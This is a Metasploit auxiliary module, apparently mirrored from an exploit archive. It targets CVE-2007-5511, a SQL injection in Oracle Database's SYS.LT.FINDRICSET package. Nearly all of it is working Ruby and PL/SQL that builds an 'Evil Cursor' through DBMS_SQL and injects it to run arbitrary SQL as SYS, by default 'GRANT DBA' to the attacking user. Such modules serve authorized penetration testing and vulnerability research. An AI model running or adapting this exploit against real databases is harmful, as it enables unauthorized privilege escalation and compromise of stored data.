## https://sploitus.com/exploit?id=PACKETSTORM:180723
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method',
'Description' => %q{
This module will escalate an Oracle DB user to DBA by exploiting
a sql injection bug in the SYS.LT.FINDRICSET package via Evil
Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on
thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical
Patch update October 2007.
},
'Author' => ['CG'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-5511'],
[ 'OSVDB', '40079'],
[ 'BID', '26098' ],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'],
],
'DisclosureDate' => '2007-10-17'))
register_options(
[
OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
])
end
def run
return if not check_dependencies
p = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
cursor = <<-EOF
DECLARE
#{p} NUMBER;
BEGIN
#{p} := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0);
SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--','');
END;
EOF
begin
print_status("Sending Evil Cursor and SQLI...")
prepare_exec(cursor)
rescue => e
return
end
end
end